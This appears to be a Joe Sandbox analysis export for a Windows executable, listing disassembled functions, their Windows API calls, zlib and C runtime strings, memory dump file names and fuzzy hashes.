_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C3BEC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C3EAA
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C40CA
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C4307
memcpy_s.LIBCPMT ref: 00007FF7691C43E2
memcpy_s.LIBCPMT ref: 00007FF7691C448D
memcpy_s.LIBCPMT ref: 00007FF7691C455C

Strings

1#SNAN, xrefs: 00007FF7691C351A
1#INF, xrefs: 00007FF7691C3533
1#IND, xrefs: 00007FF7691C34F7
1#QNAN, xrefs: 00007FF7691C3523

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: 006b587dceb6a8e5448b800068f928c3aefb42c20130fc8eaa47f3b19415637c
Instruction ID: 36f38bea85274eb9a5b826d5b010f9ff696a9acda7f55f3cf09b24f89a9ac99c
Opcode Fuzzy Hash: 006b587dceb6a8e5448b800068f928c3aefb42c20130fc8eaa47f3b19415637c
Instruction Fuzzy Hash: A1B2E372A18292CBE7299F64E5407FDB7B1FB54388FA05135DA0E57A84DB3CA902CF50

Function 00007FF7691A9FCD Relevance: 12.0, Strings: 9, Instructions: 744COMMON

Download Yara Rule

Strings

too many length or distance symbols, xrefs: 00007FF7691AA166
invalid distances set, xrefs: 00007FF7691AA4C0
invalid bit length repeat, xrefs: 00007FF7691AA3B9
invalid distance code, xrefs: 00007FF7691AA8D4
invalid code lengths set, xrefs: 00007FF7691AA14D
invalid literal/length code, xrefs: 00007FF7691AA702
invalid code -- missing end-of-block, xrefs: 00007FF7691AA3E6
invalid distance too far back, xrefs: 00007FF7691AA990
invalid literal/lengths set, xrefs: 00007FF7691AA453

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID:
String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
API String ID: 0-2665694366
Opcode ID: 7289e34dee421d23927a0f8f8a094fde9ef8b8d5e9feb20e52711e481e6fcba8
Instruction ID: ef61efd6f35e6b8e05f19d280d7604bb58e538206008985f3da0d33a5690039a
Opcode Fuzzy Hash: 7289e34dee421d23927a0f8f8a094fde9ef8b8d5e9feb20e52711e481e6fcba8
Instruction Fuzzy Hash: 9C521672A146A58BE7989F14E458B7E7BFAFB44310FA14139E64A87B80DB3DDC44CB10

Function 00007FF7691AC44C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF7691AC468
RtlCaptureContext.KERNEL32 ref: 00007FF7691AC495
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7691AC4AF
RtlVirtualUnwind.KERNEL32 ref: 00007FF7691AC4F0
IsDebuggerPresent.KERNEL32 ref: 00007FF7691AC544
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7691AC561
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7691AC56C

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
Instruction ID: 70faa9552047ccec46d88eee84f0e92deb287a84e0b5bc372644f8dfe397ee10
Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
Instruction Fuzzy Hash: 82311976609A81C6EB64AF64F8403EEB374FB84744F94403ADA4E46A95DF3CD548CB24

Function 00007FF7691A29E0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF7691A342E,?,00007FF7691A3534), ref: 00007FF7691A2A14
FormatMessageW.KERNEL32(?,?,?,00007FF7691A342E), ref: 00007FF7691A2A7D
MessageBoxW.USER32 ref: 00007FF7691A2ACF

Strings

<FormatMessageW failed.>, xrefs: 00007FF7691A2A83
%ls%ls: %ls, xrefs: 00007FF7691A2A96
Error, xrefs: 00007FF7691A2ABE

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Message$ErrorFormatLast
String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
API String ID: 3971115935-1149178304
Opcode ID: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
Instruction ID: d1a404bb48bdbd6507c22d18f3c0b7c5c183b4c218605dbdeb57b0d5c65fa8aa
Opcode Fuzzy Hash: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
Instruction Fuzzy Hash: DF216D72608A85C2E724AF11F4402EAB3B4FB88785F900136EACD53A98DF3CD656CB50

Function 00007FF7691C4F10 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF7691C4F55

Part of subcall function 00007FF7691C48A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C48BC

Part of subcall function 00007FF7691B9C58: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF7691C2032,?,?,?,00007FF7691C206F,?,?,00000000,00007FF7691C2535,?,?,?,00007FF7691C2467), ref: 00007FF7691B9C6E
Part of subcall function 00007FF7691B9C58: GetLastError.KERNEL32(?,?,?,00007FF7691C2032,?,?,?,00007FF7691C206F,?,?,00000000,00007FF7691C2535,?,?,?,00007FF7691C2467), ref: 00007FF7691B9C78

Part of subcall function 00007FF7691B9C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7691B9BEF,?,?,?,?,?,00007FF7691B9ADA), ref: 00007FF7691B9C19
Part of subcall function 00007FF7691B9C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7691B9BEF,?,?,?,?,?,00007FF7691B9ADA), ref: 00007FF7691B9C3E

_get_daylight.LIBCMT ref: 00007FF7691C4F44

Part of subcall function 00007FF7691C4908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C491C

_get_daylight.LIBCMT ref: 00007FF7691C51BA
_get_daylight.LIBCMT ref: 00007FF7691C51CB
_get_daylight.LIBCMT ref: 00007FF7691C51DC
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7691C541C), ref: 00007FF7691C5203

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$BoundaryCurrentDeleteDescriptorErrorFeatureInformationLastPresentProcessProcessorTimeZone
String ID:
API String ID: 3714727158-0
Opcode ID: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
Instruction ID: 93601a4186749160260b6781c6fdaa6d3b331dee78fc726bf11f7c6180fb29a1
Opcode Fuzzy Hash: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
Instruction Fuzzy Hash: 47D19F26A0C252C6EB28BF25F8511B9A7B1EF94784FE44135EA4D87686DF3CE441CB60

Function 00007FF7691B9924 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF7691B999D
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7691B99B5
RtlVirtualUnwind.KERNEL32 ref: 00007FF7691B99F0
IsDebuggerPresent.KERNEL32 ref: 00007FF7691B9A29
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7691B9A33
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7691B9A3E

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
Instruction ID: e920b468abaa2f5667e041e237593994bace65629b1ef3784732e8ff6be79b8f
Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
Instruction Fuzzy Hash: 90315D36608B81C6DB649F25F8502AEB3B4FB88758FA40135EA9D43B69DF3CD545CB10

Function 00007FF7691C0B84 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C0BD0
FindFirstFileExW.KERNEL32 ref: 00007FF7691C0CDA

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
Instruction ID: 387862141facbb0876d268417b8c75bedefae21d284d01052ae087f4493ecac2
Opcode Fuzzy Hash: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
Instruction Fuzzy Hash: C8B1C7A1B18692C1EE68AF25F5101B9E3B1EB54BE4FA45131EA5D07B89DF3CE441CB10

Function 00007FF7691C518C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF7691C51BA

Part of subcall function 00007FF7691C4908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C491C

_get_daylight.LIBCMT ref: 00007FF7691C51CB

Part of subcall function 00007FF7691C48A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C48BC

_get_daylight.LIBCMT ref: 00007FF7691C51DC

Part of subcall function 00007FF7691C48D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C48EC

Part of subcall function 00007FF7691B9C58: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF7691C2032,?,?,?,00007FF7691C206F,?,?,00000000,00007FF7691C2535,?,?,?,00007FF7691C2467), ref: 00007FF7691B9C6E
Part of subcall function 00007FF7691B9C58: GetLastError.KERNEL32(?,?,?,00007FF7691C2032,?,?,?,00007FF7691C206F,?,?,00000000,00007FF7691C2535,?,?,?,00007FF7691C2467), ref: 00007FF7691B9C78

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7691C541C), ref: 00007FF7691C5203

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$BoundaryDeleteDescriptorErrorInformationLastTimeZone
String ID:
API String ID: 1511944507-0
Opcode ID: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
Instruction ID: 9cf476a06e87a2b76ccd705b8f9ed2ce0ab6b908321376459e1b72f4370a8772
Opcode Fuzzy Hash: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
Instruction Fuzzy Hash: 76514B32A1C642C6E728FF21F8915A9E7B0BB48784FE45135EA4D87696DF3CE441CB60

Function 00007FF7691AC330 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF7691AC35C
GetCurrentThreadId.KERNEL32 ref: 00007FF7691AC36A
GetCurrentProcessId.KERNEL32 ref: 00007FF7691AC376
QueryPerformanceCounter.KERNEL32 ref: 00007FF7691AC386

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
Instruction ID: 2763cde2e460d71811b8eedc28c28b4342dc5aec1f1af08169427ca340403f09
Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
Instruction Fuzzy Hash: 3D114C22B14B05CAEB009F60F8442B873B4FB59758F840E31DA2D86BA4DF7CE158C750

Function 00007FF7691C2F20 Relevance: 4.8, APIs: 3, Instructions: 340COMMON

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00007FF7691C2F86
memcpy_s.LIBCPMT ref: 00007FF7691C2FB1

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: b41cb84a548d2e61bdeb7bb10330278f5fecde395d7a0ce6ff99175555b28b3c
Instruction ID: b1c7a36c953ef11851bdd318b5c5d0b248ce2edf3001a6335faead6215155775
Opcode Fuzzy Hash: b41cb84a548d2e61bdeb7bb10330278f5fecde395d7a0ce6ff99175555b28b3c
Instruction Fuzzy Hash: A2C1D172B18286C7EB289F59B0446AAF7A1F794B84F949135DB4A47784DF3DE803CB40

Function 00007FF7691A979B Relevance: 4.1, Strings: 3, Instructions: 397COMMON

Download Yara Rule

Strings

header crc mismatch, xrefs: 00007FF7691A9C41
, xrefs: 00007FF7691A987B
unknown header flags set, xrefs: 00007FF7691A97E5

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID:
String ID: $header crc mismatch$unknown header flags set
API String ID: 0-1127688429
Opcode ID: 6a55f11302ef793728786adf415505d571280719f8ef56880a9f0a37636d8ec0
Instruction ID: db810cf3e37a01d7b2922cc421d4e29ddbb879a3b131afe9a396acc7e465eaaf
Opcode Fuzzy Hash: 6a55f11302ef793728786adf415505d571280719f8ef56880a9f0a37636d8ec0
Instruction Fuzzy Hash: 77F1B072A083D58BE7A9AF15E098A3ABAF9EF44740F654538DA4907B90CB3DDD80C750

Function 00007FF7691C8A38 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF7691C8C87
RaiseException.KERNEL32 ref: 00007FF7691C8C98

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 4367feba8b0fb5a89db2d79700bffb7903d016d74ce2a4ac284103265cf95646
Instruction ID: a28763cad2116242f27553d56435eb43d3eace723c1102f572db5e92e3643fa1
Opcode Fuzzy Hash: 4367feba8b0fb5a89db2d79700bffb7903d016d74ce2a4ac284103265cf95646
Instruction Fuzzy Hash: 42B15B73604B89CBE719DF29D8863687BB0F744B48F648961DA6D837A4CB3DD851CB10

Function 00007FF7691B2CC4 Relevance: 2.8, Strings: 2, Instructions: 350COMMON

Download Yara Rule

Strings

, xrefs: 00007FF7691B3074
, xrefs: 00007FF7691B2E32

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: 25965de2e6678be5c8c686b25b3b835ec4bf2bfab2b797158b347abdb642f747
Instruction ID: bb69e21c87eda93fbede06eb75cb30347fed121319a252075eb7746b3fae4430
Opcode Fuzzy Hash: 25965de2e6678be5c8c686b25b3b835ec4bf2bfab2b797158b347abdb642f747
Instruction Fuzzy Hash: 77E1D332A08642C2EB6CAF25E15013DB3B2FF65B48FB40635DA0E07698DF29E857C750

Function 00007FF7691A95FB Relevance: 2.7, Strings: 2, Instructions: 218COMMON

Download Yara Rule

Strings

invalid window size, xrefs: 00007FF7691A9769
incorrect header check, xrefs: 00007FF7691A9782

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID:
String ID: incorrect header check$invalid window size
API String ID: 0-900081337
Opcode ID: 226024973a440a2a6261c5f164d8bafa30541a105b972a390c392a8354fe07a0
Instruction ID: 9e6d69c43412f79e83af0723fe2f21f791e52c1a98b17dfce58316b269e4a20d
Opcode Fuzzy Hash: 226024973a440a2a6261c5f164d8bafa30541a105b972a390c392a8354fe07a0
Instruction Fuzzy Hash: 9591B872A182C5C7F7A99F14E458A3E7ABDFF44350FA14139DA5A46A84CB3DED80CB10

Function 00007FF7691BD200 Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

gfff, xrefs: 00007FF7691BD38A
e+000, xrefs: 00007FF7691BD30D

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID:
String ID: e+000$gfff
API String ID: 0-3030954782
Opcode ID: 1324d18368fb7be0dec1b44ace24e6b174879433860390047f5d35653063db2a
Instruction ID: f3080510bead10f36bdc78945f298b7ea496713e056a0acdd211bb891130d691
Opcode Fuzzy Hash: 1324d18368fb7be0dec1b44ace24e6b174879433860390047f5d35653063db2a
Instruction Fuzzy Hash: 20517CA6B1C3C1C6E72C9E35A81176DEBA2F744B94FA89232CB5847AD9CE3DD441C710

Function 00007FF7691BCD6C Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

gfffffff, xrefs: 00007FF7691BD0AE

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID:
String ID: gfffffff
API String ID: 0-1523873471
Opcode ID: ee332c23296b8dd3ed29fdb42bef122adb490463d0c8b601810d73b835641fc7
Instruction ID: d2a228a54e65f4fefaf28cd6c334e1ca2075dab5880ca33d8d15295716180e67
Opcode Fuzzy Hash: ee332c23296b8dd3ed29fdb42bef122adb490463d0c8b601810d73b835641fc7
Instruction Fuzzy Hash: ADA13862B08786C6EF29DF29B0007A9BBA2EB54B84F648136DF4D47789DA3DD501C711

Function 00007FF7691B7AAC Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

TMP, xrefs: 00007FF7691B7ACB

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

